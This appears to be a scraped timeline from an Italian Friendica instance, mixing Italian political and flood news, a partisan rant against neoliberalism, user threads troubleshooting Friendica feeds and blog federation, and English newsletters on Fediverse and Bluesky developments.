Il neoliberismo promuove che un bambino non abbia una propria religione, ma questo è contrario alla libertà di espressione del bambino, questo è contrario alla natura umana! C'era una volta, le persone creavano idoli e dei per se stessi. Ed è del tutto naturale e normale che un bambino professi istintivamente la religione dei suoi genitori.
Ora [il neoliberismo] promuove la stessa cosa, cioè che la marijuana e le droghe sono generalmente innocue, e oggi puoi persino acquistarle legalmente nei negozi alla stessa stregua del pane! Presto inventeranno qualcos'altro di dannoso da legalizzare... Questo è liberalismo!
Oggi il neoliberalismo dichiara che un bambino nasce senza genere e che col tempo deve scegliere il proprio genere. Questo è davvero molto strano. Cosa dovremmo capire di tutto questo?
Il neoliberismo distrugge l’umanità facendo tutto ciò che danneggia i valori e le religioni delle persone, perché i valori/le religioni servono l’umanità, quindi il neoliberismo cerca di separarli dalle persone! Chiaro ed incisivo 👏 💢💢💢 https://t.me/radio28tv
Hello everyone @Friendica Support ! I filed this issue on github and it has been pretty ignored. Of course I don't expect it to be taken into consideration, but I would like to know if I'm the only one who perceives this feature as a problem. I would also be curious to know if in your opinion the issue is easily solvable, or if it requires an unjustifiable effort?
For those who do not have a GitHub account, I report the text of the Issue here:
Good evening everyone.
Introduction
Like most software in the Fediverse, Friendica accounts can also be "followed" through their RSS feed.
In this way, it is possible to use the string https://INSTANCENAME/feed/USERNAME/
Is the feature request related to a problem? Please describe.
Unfortunately, however, the feed of the Fediverse accounts publishes only the contents of that account and not, for example, those reshared.
This choice, although understandable for normal accounts, is much less understandable for Groups (the former Forums), since these groups do not publish (if not rarely) their own contents.
Describe the feature you'd like
The developers Lemmy have brilliantly solved the problem with their "Communities" (the Lemmy version of Activitypub groups) and today it is possible to follow the feed of the Lemmy communities through the string https://ISTANZA/feeds/c/NOMEUTENTE.xml?sort=New
I therefore wonder if it is not possible to make it so that at least the "Group" type accounts can display a feed that also includes shared content.
Describe alternatives you've considered
I can't think of any valid alternatives. I tried in vain to follow a Friendica Group with a Lemmy account (basically I signed up to the "group" which obviously in Lemmy is seen as a "Community"): basically I wanted to use Lemmy to make him export the RSS feed... Unfortunately, however, there are still problems that do not allow the contents of Friendica to be correctly synchronized in the community view of Lemmy.
“Servono decisioni concrete, tagliate i legami con i nostri assassini. I leader dei Paesi democratici devono smettere stringere la mano agli assassini delle donne iraniane”. Lo ha detto Masih Alinejad, attivista per i
@Politica interna, europea e internazionale L’avvocato Silverio Sica, legale dell’ex ministro della Cultura Gennaro Sangiuliano, ha presentato alla Procura di Roma una denuncia a carico dell’imprenditrice Maria Rosaria Boccia. L’esposto, secondo quanto riporta l’agenzia di
@Politica interna, europea e internazionale Al circo della politica italiana gli acrobati eseguono il numero più spettacolare, applaudito più dei pagliacci. Tra sussulti, retromarce, intoppi e piroette senza rete, prosegue il tentativo dei centristi di intrufolarsi nel campo largo ligure del centrosinistra,
[quote]La conclusione dell’esercitazione Stella Alpina 24, che ha coinvolto oltre seicento unità provenienti da corpi diversi dell’Esercito ed è durata due settimane, costituisce un importante momento di confronto con le esigenze tattiche e operative dei nuovi scenari di
In seguito all’emergenza maltempo in #EmiliaRomagna, con evacuazioni in numerosi comuni a causa di piogge intense e allagamenti, il #MIM, in collaborazione con la Protezione Civile e le autorità locali, ha messo a disposizione alcune strutture scolas…
In seguito all’emergenza maltempo in #EmiliaRomagna, con evacuazioni in numerosi comuni a causa di piogge intense e allagamenti, il #MIM, in collaborazione con la Protezione Civile e le autorità locali, ha messo a disposizione alcune strutture scolas…
@Politica interna, europea e internazionale Il TPI Fest 2024 torna domani, venerdì 20 settembre, in solidarietà con la popolazione dell’Emilia-Romagna colpita dalle alluvioni In solidarietà e rispetto nei confronti della popolazione dell’Emilia-Romagna colpita dalle alluvioni, è
@Politica interna, europea e internazionale Alluvione Emilia-Romagna: polemica tra Governo e Regione L’alluvione che sta colpendo la parte orientale dell’Emilia-Romagna diventa terreno di scontro politico tra il Governo di centrodestra e la Regione guidata dal centrosinistra. Il ministro per la
[quote]Diversamente da come accade in Europa, dove le discussioni intorno alla Difesa hanno iniziato solo recentemente a registrare il profondo mutamento dei contesti securitari odierni, negli Stati Uniti ci si interroga costantemente su cosa dovesse accadere in caso di conflitto, specialmente con la Cina. Dopo
When a Starship employee talked to the police, the report says, he asked for the employee’s information “so he could contact her and offer their insurance information for her injuries and ‘promo codes.’”#Starship #DeliveryRobots #FOIA
Infostealer malware is often hidden in pirated or cracked software, and hackers then post the harvested credentials and other data online. Criminals have been infected too.#News #Hacking
Ora bisognerebbe prendere un negazionista del cambiamento climatico e portarlo a #Faenza, così magari ci può dire se è sempre stato così...(1diot4!)🤬 #alluvioni #negazionisti #noClimateChange
@Notizie dall'Italia e dal mondo L'organizzazione sostenuta dal governo, che porta volontari negli avamposti agricoli israeliani, è uno dei principali motori del furto violento di terra in Cisgiordania L'articolo Cos’è Hashomer Yosh, l’ultimo gruppo di coloni colpito dalle
Friendica è un social molto particolare che consente di scrivere post lunghi, formattati, con immagini in linea e dotati di un vero titolo; inoltre presenta alcune primitive funzionalità di pubblicazione programmata che ricordano quelle delle piattaforme di blogging più utilizzate.
Ecco perché chi usa Friendica è spesso un utente proveniente da Mastodon, un sistema che con le sue limitazioni permette una fruizione passiva del Fediverso piuttosto completa, ma una capacità di pubblicazione attiva decisamente limitata.
Oggi cerchiamo di capire perché Friendica potrebbe essere una soluzione utile anche per chi possiede già un blog e che quindi dispone già di sistemi di pubblicazione avanzati o, addirittura, sta utilizzando piattaforme già federate, come Writefreely o come Wordpress con il fantastico plugin Activitypub for Wordpress.
1) Impostare il proprio account Friendica per fare in modo che ricondivida automaticamente i post pubblicati dal proprio blog
Per attivare questa funzionalità (che funzionerà solo se il blog dispone di un feed RSS o se è federato con il Fediverso), è sufficiente inserire l'indirizzo del blog nella casella di ricerca di Friendica e premere il pulsante "Cerca". A quel punto bisognerà seguire il blog, che comparirà come un qualsiasi altro contatto, e selezionare tra le opzioni del contatto "Duplica come miei messaggi" (per i blog non federati) o "Ricondivisione nativa" (per i blog federati).
2) Sopperire alle mancanze di un blog Writefreely.
Writefreely è infatti la piattaforma di pubblicazione federata più semplice ma, nel suo obiettivo "distrazioni zero", l'utente che pubblica un post su Writefreely, in caso di risposta da parte di un qualsiasi utente del Fediverso, non solo non riceverà alcuna notifica ma addirittura non potrà vedere le risposte a meno che non disponga di un'utenza social. Per questo motivo consigliamo a tutti coloro che abbiano un'utenza social di inserire in fondo al post a mo' di firma il proprio identificativo social nella forma @nomeutente@istanza: in tal modo, chi risponderà al post Writefreely, risponderà anche a quell'indirizzo del fediverso. Purtroppo però l'utente, nella propria risposta, potrebbe anche cancellare il secondo indirizzo, per cui non ci sarebbe più alcuna possibilità di venire allertati su quella risposta! Proprio qui ci viene in aiuto Friendica: infatti, utilizzando il sistema spiegato nel punto 1), ossia la ricondivisione automatica, Friendica ci farà avere anche una notifica ogni volta che qualcuno risponde al post che il sistema ha ricondiviso! Questa limitazione di Writefreely può essere estesa a tutti i blog federati che hanno deliberatamente disattivato le risposte degli utenti: in quei casi, le risposte ci saranno lo stesso e saranno visibili dal Fediverso, solo che non verranno "viste" dal blogger.
3) Creare o usare un gruppo Friendica tematico
Un gruppo Friendica tematico (una sorta a metà tra una lista di distribuzione e un gruppo Facebook) che possa essere "menzionato" da tutti i blog Wordpress federati (il blog dovrà "seguire" il gruppo Friendica, una funzionalità prevista nei plugin di Wordpress). In tal modo, quando un post menziona il gruppo Friendica, il gruppo Friendica ricondividerà il post a favore di tutti coloro che già seguono il gruppo.
PS: approfittiamo per far sapere a tutti i nostri follower che esistono due account dedicati a chi è interessato ai blog federati
1) Il primo è @Il blogverso italiano di Wordpress dedicato a tutti i blog italiani wordpress che si sono federati attraverso il fantastico plugin sviluppato da @Matthias Pfefferle Chiunque sia interessato a essere aggiunto tra i blog ricondivisi o a segnalare un nuovo blog Wordpress federato, può farci sapere direttamente a questo account
2) Il secondo è @I blog di Writefreely dedicato ai blog italiani basati su Writefreely. L'account al momento non ricondivide i post degli account, ma rispecchia i loro feed RSS. Ah, l'account è anche un gruppo Friendica e quindi se volete segnalare nuovi blog Writefreely, potete farlo menzionando quell'account
@acor3 or mi sovviene che devo controllare come son #federati i miei blog #WordPress. Sono in un (piccolissimo) network (senza sottodomini) e se non ricordo male faceva un po' di confusione nel trovare il profilo del proprietario 😅 @admin @pfefferle @fediverso @blogverso
@marco acorte ho inserito il blog achortech tra i blog da ricondividere, ma il blog acor3.it mi dà invece un errore che ho già ricevuto altre volte da alcuni blog wordpress. Un bel giorno riuscirò a capire a cosa è dovuto questo problema, ma non è questo il giorno... 🤔😭
@marco acorte @Signor Amministratore comunque a quanto pare lo fa solo con Friendica e non con Mastodon. Probabilmente Friendica chiede il contatto in modo diverso...
@talksina attenzione: se il blog è già federato Activitypub, Friendica non ha bisogno di recuperare il feed ma può semplicemente ricondividere automaticamente l'account WordPress.
In pratica:
- Blog NON federato: l'account Friendica segue il feed RSS, lo cattura e lo condivide come se l'avesse scritto lui - Blog federato: l'account Friendica non segue tramite RSS MA tramite ActivityPub e non fa altro che il retweet automatico del post
@marco acorte per curiosità, come è nata questa impostazione di blocco? Si sviluppa di default ogni volta che vengono rilevati più tentativi di connessione?
E come si possono modificare gli indirizzi da bloccare?
Tra le altre cose, puoi far sì che i tuoi post vengano crosspostati in una comunità Lemmy (il "Reddit" del Fediverso), semplicemente menzionando la comunità Lemmy che ritieni più adatta nel tuo post.
È possibile pubblicare post su Lemmy dal tuo blog Wordpress? Se questo post apparirà nella community @fediverso@feddit.it allora questa ipotesi sarà confermata!
È possibile pubblicare post su Lemmy dal tuo blog WordPress? Se questo post apparirà nella community @fediverso@feddit.it allora questa ipotesi sarà confermata!
che bello vedere che esistono tutti questi fantastici progetti per un web di nuovo aperto! E adesso che faranno quelli che un anno fa dicevano che il Fediverso era morto? 😂
@Signor Amministratore ⁂ io sto provando a impostare il repost automatico dei miei contenuti mastodon, ma senza riuscire. È per caso una funzione bloccata?
@djpanini probabilmente stai sbagliando qualcosa. Per trovare il tuo contatto, Devi incollare il nickname completo o il link del profilo nella casella di ricerca Friendica. Poi è fondamentale seguire quel profilo, perché se non lo segui non puoi attivare le funzionalità di repost automatico. Infine, dovrei andare nella seconda sezione disponibile sulla pagina Friendica del tuo profilo remoto, ossia impostazioni contatto, e selezionare ricondivisione nativa
Scoperti due getti lunghi 23 milioni di anni luce l MEDIA INAF
"Scoperta la più grande coppia di getti emessi da un buco nero mai osservata: si estende per 23 milioni di anni luce, una distanza equivalente a 140 galassie come la Via Lattea, allineate una dopo l’altra. A individuarle è stato il radiotelescopio europeo Lofar. Nel team che ha scoperto queste megastrutture e che ha firmato un articolo apparso oggi sulla rivista Nature ci sono due ricercatori Inaf."
@Notizie dall'Italia e dal mondo Spasil Zazai, attivista per i diritti delle donne, è fuggita dall'Afghanistan in Pakistan. Dopo tre anni lei e le sue figlie sono ancora in attesa di ottenere il visto. L'articolo PAKISTAN. Rimpatri e abusi per i migranti afgani in fuga dai talebani proviene da
Da qualche giorno il mio canale "Italiano" è mutilato, nel senso che rimane troncato dopo una manciata di post (numero variabile, ieri ne ho contati 23, stamani solo 12). Troncato proprio, nemmeno fermo in un caricamento di altri post.
Questo mi infastidisce abbastanza, il feed di quel canale è quello che consulto maggiormente.
Sono l'unica su @Poliverso :friendica: ad avere questo problema? @Signor Amministratore è cambiato qualcosa dopo l'upgrade di Friendica? Non sono certa che il problema abbia cominciato a manifestarsi subito dopo, ma sono sicura di non averlo avuto prima.
Tra le impostazioni non ho trovato niente di utile.
Ciao @floreana nelle impostazioni del nostro server, i contenuti rilevati nei canali hanno una durata di 96 ore. Al momento non abbiamo mai modificato questa durata né le altre impostazioni, anche se stiamo valutando di aumentare il numero di post rilevabili da uno stesso autore da 2 a qualcosa di più.
Qui puoi vedere le impostazioni attuali:
Al netto di eventuali problemi tecnici (che al momento non sono in grado di rilevare), quello che è successo potrebbe dipendere dal fatto che alcuni post siano spariti dalla timeline del canale solo perché hanno raggiunto le 96 ore di vita.
In realtà non vedo già più i post di ieri, né quelli di stamattina. 😕
(Edit: i più vecchi prima della troncatura sono di appena un'ora fa).
Rispetto a "prima" è una riduzione significativa. Magari dipende da me, anche se non ho cambiato niente. Devo fare un controllo incrociato e vedere se mi succede lo stesso anche da PC.
@Signor Amministratore @Poliverso :friendica: È mezz'ora che setaccio le impostazioni e non sto ritrovando quella per cambiare tema. Mi sono rincoglionita? Ha cambiato posto? Non c'è più? ("Non c'è più Google" cit.)
@Signor Amministratore @Poliverso :friendica: Visto che il problema da browser persiste, proverei con un'app. L'ultima volta però non ne ho trovata nessuna che gestisse i canali di Friendica. Ne conosci qualcuna che sia in grado? 🤔
@Signor Amministratore @Poliverso :friendica: Non ho idea di quale sia il tema di default. Tra le opzioni ho solo la scelta tra quello blu e quello bianco (onestamente inguardabile, senza offesa per gli sviluppatori) di cui ho postato gli screenshot. 🤔 Magari mi ricordo anche male, ma mi pare che il blu fosse quello preimpostato.
@Signor Amministratore @Poliverso :friendica: Ah no, ho capito cosa intendevi. Ho provato tutte e tre le versioni (Light, Dark e Black) e gnente, mi rimane il feed mutilato. Ho anche deselezionato l'unica cosa che avevo cambiato in tempi recenti, cioè l'apertura sempre della finestra di composizione di un nuovo post al posto di quella "rapida". Non cambia comunque gnente. 😭
@floreana io ho l'impressione che il tuo android copra la fine della pagina e non ti faccia vedere la freccetta in avanti a fondo pagina...
Nel caso, hai provato a modificare l'impostazione per lo "scorrimento infinito" (infinite scroll) della timeline? Questa ti permette di fare a meno della freccetta e, quando arrivi a fondo pagina, ti carica i contenuti ulteriori
@Signor Amministratore @Poliverso :friendica: Anche su Raccoon il feed della timeline in italiano è troncato. Nello stesso punto in cui si tronca da browser. 🤣 Mi si è attaccata la rogna...
Raccoon ottiene la timeline "Iscrizioni" da una GET v1/timelines/home passando i query param limit (numero elementi per pagina) e max_id (ID del post a partire dal quale restituire i risultati, ovvero tutti i meno recenti di quello).
Sembrerebbe un problema di paginazione, si interrompe sempre allo stesso post oppure di giorno in giorno la finestra si sposta in avanti?
@Dieguito 🦝 Ho provato anche con Vivaldi su mobile Android: stessa frittata. L'unica differenza in questo caso è che sembra impastarsi in un caricamento di ulteriori post (compare la rotellina), ma lo schermo prende a sfarfallare e alla fine non succede comunque niente.
Ok, capito... allora torniamo al punto di partenza. Dato che sei anche tu su poliverso.org dove è molto semplice creare account ancillari, potresti provare con un altro account a vedere se cambia qualcosa...
@Signor Amministratore @Dieguito 🦝 Qualcosa è migliorata: arrivo a caricare nuovi post dopo un'abbondante scrollata e arrivo al "fondo" dopo un'altra abbondante scrollata. L'ultimo post che vedo da browser (Firefox su Android) e su Raccoon è di 3 ore fa anziché una sola. 😄
@floreana mi fa veramente molto piacere saperlo. Mi dispiace di non essere riuscito a capire ancora quale potrebbe essere stato il problema, ma ritoccando un po' qua un po' là qualche parametro alla fine sembra che siano riusciti a risolvere il problema...😁
@floreana @Signor Amministratore ⁂ @Poliverso :friendica: Bump per dire che adesso secondo @raccoon il problema sembra essere un caricamento infinito (no, il problema non è mai rientrato, nonostante un iniziale barlume di speranza). Intanto mi sono scoraggiata. 😭
L'immagine mostra una testa di procione stilizzata su uno sfondo nero. Sopra il procione ci sono cinque icone: una freccia curva, un razzo, un cuore, un segnalibro e una freccia rivolta a destra. Sotto il procione ci sono tre icone: un cerchio, un triangolo e un quadrato.
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it I racconti di resistenza degli attivisti contro il mega gasdotto della Linea Adriatica su cui punta il Governo Meloni L'articolo La Linea Adriatica della Snam. Un’opera inutile che devasta l’ambiente proviene da Valori.
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it Il prezzo dell'oro ha raggiunto un nuovo record, superando i 2.600 dollari l'oncia. Potrebbe essere l'ennesima speculazione ben costruita L'articolo Quali sono le vere ragioni del prezzo record dell’oro proviene da Valori.
The Saint and allkillersnofillers present: Adventure with the Saint Episode n° 48 The Work of Art 31 - PODCAST The Saint and allkillersnofillers present: Adventure with the Saint Episode n° 48 The Work of Art 31 -
Welcome back to another update. Some short housekeeping notes: Last Week in Fediverse will now release every Wednesday. Furthermore, I’ve split all news about Bluesky and the ATmosphere into it’s own separate newsletter, Last Week in the ATmosphere. I originally wanted to keep them together, but the newsletters were simply getting too big, so it was time to split them. Lots of news this week with FediForum, a Fediverse Discovery Project, and mozilla.social shutting down, so lets dive in.
The news
The fourth edition of FediForum happened this week, a three-day unconference with speed demos of fediverse projects as well as some 40 open sessions about anything related to the fediverse. There were 14 demos, of which the video recordings should be available soon. Two demos stood out to me, showing products that have not been seen before, with Newsmast with channel.org, and Darius Kazemi’s ActivityPub Data Observatory. While there were lots of other great demos as well (Bandwagon for example), these mainly featured existing products.
Channel.org is the latest project by Newsmast, and is a way for organisations, nonprofits, and news publishers to build their own channel for outreach. It is fully connected to the fediverse with the front-end providing a clear and simplified interface that simply shows the latest posts by a channel. This can be seen with the demo Channel for the Kamala Harris Group, which recently got switched over to use Patchwork, Newsmast other fediverse project. Channel.org is based on Patchwork, which is a plug-in architecture that Mastodon server admins can run on top of their Mastodon server. Patchwork is getting close to being released, and Newsmast is currently looking for admins who are willing participate. Patchwork is free and publicly available, while Channel.org will require a paid membership and targets larger public organisations.
The ActivityPub Data Observatory allows fediverse developers to scan the structure (not the content!) of data that gets send around on the fediverse, allowing developers to easily compare how different sofware structures their ActivityPub data. For example, you can easily compare how Misskey structures the ActivityPub code of a note, versus how Mastodon sends the ActivityPub code for a note. The open-ended nature of ActivityPub allows developers to give their own spin on implementing ActivityPub
As for the sessions, one recurring theme I noted is the need and demand for spaces to discuss the governance and social side of the fediverse and fediverse developments. While there are spaces for the technical aspects of the discussion of the fediverse and the protocol with the SocialCG, the SocialHub and the Fediverse Developer Network, these communities are less accessible to the technical inclined people. This is a conversation that also has come up during previous FediForum sessions. The Fediverse Governance Report also notes a lack of formal channels for Federated Diplomacy. While the need and demand is clearly there, it seems to be hard to figure out a way to establish such communications channels in a way that also establishes them as legitimate places for discussions and diplomacy.
Another aspect that stood out to me is the lack of discussions that I noticed about Bluesky during FediForum, and what lessons can be learned that can be applied to the fediverse. Bluesky has managed to grow significantly bigger than the fediverse at this point, with around 5 times as many monthly active users, as well as onboarding the Brazilian community. It seems to me that it is worth reflecting on why that is, and how the fediverse can better show itself as a good, ethical social network that people would like to join.
Fediverse Discovery Providers
The organisation behind Mastodon (Mastodon gGmbH) has announced a new project, Fediscovery, that explores decentralised search and discovery for the fediverse. The project got funded by NGI Search, and “explores the possibilities for better search and discovery on the Fediverse in the form of an optional, pluggable service. This service should be decentralized, independent of any one specific Fediverse service and respect user choice and privacy.” Mastodon gGmbH is explicitly not building only for Mastodon, they make it clear that they intend Fediscovery to be used by the wider fediverse, not only Mastodon.
What Mastodon gGmbH is building here is what they call a ‘Fediverse Auxiliary Service Providers’. These auxiliary service providers can potentially do a variety of different services. The Fediscovery project is about building one of these service providers, a disovery provider, as a minimum proof of concept and as a demonstration what types of services other people can build as well. The plans are currently still in the very early stages, and more information expected at the end of September. For my own understanding I think of a Fediverse Auxiliary Service Provider as pretty much a Relay, with some minor yet-to-be-announced differences.
Mastodon gGmbH is also explicit in focusing on opt-in consent for the service, stating that it will “only ingest content from creators who opted in to discovery in the first place. Instances sending content to discovery providers should make sure to only send such content in the first place as well. All other information a discovery provider gathers should be anonymous.”
During a FediForum session about Fediscovery, Mastodon CTO Renaud Chaput confirmed that between 8% and 10% of active accounts have opted into Mastodon’s search, a year after it has been released. It indicates one of the fundamental challenges of any design that is opt-in: very few people will change the default settings, irregardless of what the settings are about. As Discovery and Search systems gain value by covering a bigger network, it shows the fundamental tensions that Mastodon gGmbH will have to grapple with while building Fediscovery.
Mozilla shuts down mozilla.social fediverse server
Mozilla has announced that they will shut down the mozilla.social server in December 2024. The server was announced in December 2022 as a way to ‘explore healthy social media alternative’. The project was originally quite big in scope, with planned integrations to log in with Firefox, and the GitHub repo showed their own mobile clients, and a custom front-end based on Elk. In 2023 Mozilla started to very slowly open up in a private beta, but the number of people getting access has been low. In February 2024 Mozilla downsizes as it refocuses on Firefox, scaling back their investments in various products, including their mozilla.social fediverse server. In an accompanying memo Mozilla stated at the time: “The actions we’re taking today will make this strategic correction, working through a much smaller team to participate in the Mastodon ecosystem and more rapidly bring smaller experiments to people that choose to live on the mozilla.social instance.”
It seems like these more rapid smaller experiments never came, nor did it seem that Mozilla was particularly interested in growing the server. I honestly cannot find out if the server ever opened up for open registrations after they ran a waitlist for a long time, but it seems like it they have not. At any rate, the experiment stayed small, and mozilla.social currently has just below 300 active users.
The shutdown of Mozilla.social does raise questions about the server-centric model that the fediverse is based around: are there organisations that are willing to run large general-purpose fediverse servers, and have the ability to handle the infrastructure costs and moderation requirements that come with it. Mozilla seemed like it would be a good organisation to potentially do that. With Mozilla now pulling back, focusing on smaller servers might be a more logical direction going forward.
In Other News
Threads has figured out how maximise publicity by making minimal incremental updates to their ActivityPub implementation, edition 501.
Bonfire showcases how with third-party extensions scientists can display ‘relevant data about their work and research topics directly on their profiles.’ Bonfire does not yet know when the platform will launch.
The client Kaiteki, which focused on being a client for all the different microblogging platforms in the fediverse, stops development.
The German Federal Ministry of Education and Research had stopped using their Mastodon account in October 2023, and after not posting for most of the year they said they’d close the account. After a large pushback from the community they reconsidered the decision and said they’d continue using the account again.
The new Trust and Safety Taskforce with the SocialCG has set up an issue tracker for protocol level and/or specification changes to improve trust and safety on the fediverse.
The Fediverse Berlin Day had multiple sessions about, well, the fediverse. Full live stream available here, with the German publisher ARD talking about their fediverse experience and strategy. Evan Prodromou also gave a talk about a ‘bigger, better fediverse’, which you can watch here. I do want to note that I find it very hard to square Prodromou’s estimation of 10 million federated Threads account with the fact that Mastodon.social (which accounts for a quarter of the entire fediverse’ monthly active users) currently knows about 18000 federated Threads accounts.
In This Issue
* A Note From The Editor
* Features
* Feature: RFF's August Fediwave Retrospective
* Feature: Owncast On Lemmy
* Featured Streamer: Pretok.
Welcome to the weekly update on everything that’s happened on Bluesky and the broader network called the ATmosphere. A short introduction for people who might not know me: I’m Laurens Hof, and the last year I’ve written a monthly update on all the news that’s happened on Bluesky. I’ve written a weekly newsletter about everything that is happening in the fediverse, the other decentralised social network, as well over the last year and a half. And now you can expect even more regular updates on Bluesky and the ATmosphere as well, coming out every Wednesday. It’s been a busy week* with video, 10 million accounts, and more!
The News
Bluesky has added support for video. The feature has been often requested, especially from the Brazilian community. Over the last few weeks the team has made it their top priority to launch the feature as soon as possible. Videos have indeed been very popular on Bluesky, with 169 years of videos being served within 2 days, and half a million videos posted within 4 days. Each video can be one minute long, and people can upload 25 videos per day.
There are two things that stand out to me about Bluesky’s video support: videos have shown to be highly popular on Bluesky, and the openness of the ATmosphere network allows people to build new types of network that are more catered towards watching videos specifically. I’m curious to what extend this will actually happen. Furthermore videos require significantly more resources than text posts, so it is worth watching how this impacts Blueskys thinking about costs and monetization.
Bluemotion is a video hosting app for Bluesky, by the same developer that also makes the audio spaces Bluecast for Bluesky. The developer announced that Bluemotion will be shut down as it has fulfilled its role.
Bluesky crossed 10 million accounts this week, of which around 4 million came in the last month or so after the ban in Brazil on X. It now has around 5.5 million monthly active users. User retention after this new signup wave is also notably high, with daily active users peaking at 1.91 million, and staying at 1.57 million some two weeks later. Every signup wave has a significant amount of churn, as it is very difficult to get people to change their habits and start regularly using a new social platform, and Bluesky’s churn seems low to me. Bluesky celebrated this milestone by letting everyone know which number they joined the network with, and how early they were. The amount of people sharing it shows that people on Bluesky definitely like to show off their early-adopter status.
The adoption of Bluesky by the Brazilian community as the default social network after the ban on X has continued. After the dust has settled it looks like the Brazilians now fairly consistently represent three quarters of the total posts on the network. President Lula (‘s social media team) shows that they’re aware of the features that Bluesky offers, and has used a Starter Pack to promote different candidates for elections. Some of the biggest football clubs in Brazil have established an official presence as well, such as Corinthians and Vasco da Gama. When goals get scored during the games, this is now clearly visible in significant spikes in posts, with the number of posts per second doubling temporarily. Another developer made a directory of Brazilian accounts on Bluesky, sorted by various categories, to help people onboard as well. A Brazilian esports organisation now sells handles with their (sub)domain to raise money for the organisation as well as for people to show they support the team.
The Brazilian Bluesky community also had their first major cultural moment this week. During a televised debate between electoral rivals for mayor of Sao Paolo, one of the candidates hit one of the other candidates with a chair. Videos of the event went viral, and over the last two days the majority of the network’s top posts have been memes about the event. One of the most popular posts described it as ‘a really canonical event on this social network’. This is also in contrast with Threads, where the event seems to have not gone viral at all.
Skyware is a new lightweight labeler server. Originally, the labeling system was designed by Bluesky to be a content moderation system. Over time, the labeling system has slowly transformed, away from content moderation, and towards labelers that you can self-apply for silly or more practical use-cases as indicating your pronouns (or to recreate Orkut). Skyware is the next evolution in this, where the software is only for labeling accounts, and the moderation part of the system is stripped away altogether. Still, other organisations are experimenting with using labelers for content moderation: News Detective is a fact checking organisation that now has a labeler on Bluesky as well. How effective a fact-checking system is when people have to opt into receiving the fact checks on a social network remains to be seen however.
A research paper that studies how Bluesky has evolved from invitation-only to being open to the public. One of their findings is that Bluesky is a chatty network, something that was already the case before the arrival of the Brazilians: users tend to create more posts than reshare other posts, in contrast with Twitter/X where the dynamic is the other way around.
For the people interested in the nitty-gritty of protocols: NodeInfo is a standardized way of exposing metadata about a server running one of the distributed social networks, and it is currently mainly used for ActivityPub servers. Now there is an effort to expand NodeInfo so it can also be used for a PDS on atproto.
Bridgy Fed is a way to connect Bluesky to other decentralised social networks such as Mastodon. The latest update now also bridges video between the network, and you can let the bridge ask an account via a DM if they want to opt-in to the bridge. Bridgy Fed will only send a DM once, even if someone else also asks.
Graphtracks allows you to check the statistics of atproto accounts, allowing you to see a graph of your follow and likes over time. It shows the power of a completely open API, where anyone can now have full detailed statistics about their account.
That’s all for this week, thanks for reading! You can subscribe to my newsletter to receive the weekly updates directly in your inbox below, and follow me on Bluesky @laurenshof.online.
* 10 days actually, I switched from publishing on Sunday to publishing on Wednesday this week as well.
@Notizie dall'Italia e dal mondo La risoluzione ha ricevuto 124 voti favorevoli, 43 paesi si sono astenuti, Israele, gli Usa e altri 12 Stati hanno votato contro. L’Italia si è astenuta L'articolo Onu a Israele: stop a presenza illegale nei Territori palestinesi entro 12 mesi
Riceviamo e pubblichiamo da Leonardo Cribio
🌍 TRE GIORNI PER LA PACE 2024 🌍
"Assange e Guerra al giornalismo"
🎤 Dibattito con i giornalisti:
Germana Leoni
Fabrizio Cassinelli
Giuliano Marrucci
Massimo Alberizzi
Alberto Negri (in collegamento)…
Oggi il Ministro Giuseppe Valditara ha firmato il decreto a favore di 19 nuove Fondazioni #ITSAcademy, che nel 2023 hanno avviato almeno un percorso formativo. Grazie al provvedimento riceveranno oltre 55 milioni di euro.
Oggi il Ministro Giuseppe Valditara ha firmato il decreto a favore di 19 nuove Fondazioni #ITSAcademy, che nel 2023 hanno avviato almeno un percorso formativo. Grazie al provvedimento riceveranno oltre 55 milioni di euro.
Lustery, a site for consent-based homemade porn, has added a new clause to its contract promising not to replace human performers with AI without consent.#News
#TuttiAScuola, riviviamo insieme la cerimonia di inaugurazione del nuovo anno scolastico che si è svolta lunedì #16settembre presso il Convitto Nazionale “Vittorio Emanuele II” di Cagliari.
#TuttiAScuola, riviviamo insieme la cerimonia di inaugurazione del nuovo anno scolastico che si è svolta lunedì #16settembre presso il Convitto Nazionale “Vittorio Emanuele II” di Cagliari.
🎥 Qui il video ▶ https://youtu.
IL LIBRO Con un titolo quasi secentesco, il libro della natura e del continuo funziona da prosecuzione di alcune ossessioni testuali di Mario Corticelli, già godibili nei suoi precedenti lavori: una su tutte quella per i fenomeni naturali e gli animali e il loro mondo, meticolosamente de-antropomorfizzato. Oppure il ricorso a un tagliente registro ironico, se non addirittura di scherzo-scherno, diretto tanto al contesto degli umani quanto agli scambi linguistici che questi istituiscono: «e poi si odono feste di mercato / con gioia di genti / nel crollo dei prezzi di mercato / con una qualche distruzione delle genti / perlunga la strada che è lucente / che bello che è il linguaggio delle genti / con una qualche distruzione del linguaggio». Impossibile non vedere nell’intelligenza di simili soluzioni, e di tante altre nel libro, un segno di quella traccia caustica beffarda e insieme paradossalmente leggera – di cui Corticelli è erede/innovatore – che rimonta al nome di Corrado Costa: «petizione per la diffusione dei boschi anche nelle foreste / petizione per la diffusione dei pini anche negli abeti dei boschi / petizione per la diffusione degli aghi anche negli aghi». In definitiva, questo De rerum natura giocosissimo – che sposta sempre di lato, in un angolo bizzarro e in nuovi inciampi il caosmos che descrive – si disimpegna dal ruolo di riprodurre paesaggi, bestie, regole, mappe e tassonomie, e semmai disorienta con gran gusto quel che pensavamo essere una stabile visione delle cose, talvolta disturbando le immagini naturali come farebbe un programma di intelligenza artificiale: «un cervo. presenta un eccesso di denti che gli sporgono dai fianchi e dal dorso, che ce lo fanno immaginare già mangiato dall’interno, morto tuttavia chi lo ha mangiato. nei pressi di un burrone, esterno».
L’AUTORE Mario Corticelli ha pubblicato testi poetici nelle antologie RZZZZZ! (Transeuropa Edizioni) e Àkusma (Metauro Edizioni) e su numerose riviste, fra cui Versodove, Nioques, OEI. Un modo (gammm.org) è del 2011. Tra il 2014 e il 2015 sono usciti due libri e un ebook legati in una trilogia aperta: Aria (comunione) (IkonaLíber, 2014), la sezione aria della serie mille idilli (gammm.org, 2014) e Costruzione di un animale (Arcipelago Edizioni, 2015). Del 2018 è Qualche parte del cane (Tic Edizioni). Su gammm.org e su pontebianco.noblogs.org è possibile leggere prose da sottrarre il bambino (2024).
Signor Amministratore ⁂
Unknown parent • •@marco acorte Grazie, davvero molto interessante!
@Matthias Pfefferle @Il blogverso italiano di Wordpress
Marco Siino likes this.
Paolo Redaelli
Unknown parent • • •Il blogverso italiano di Wordpress likes this.
Il blogverso italiano di Wordpress
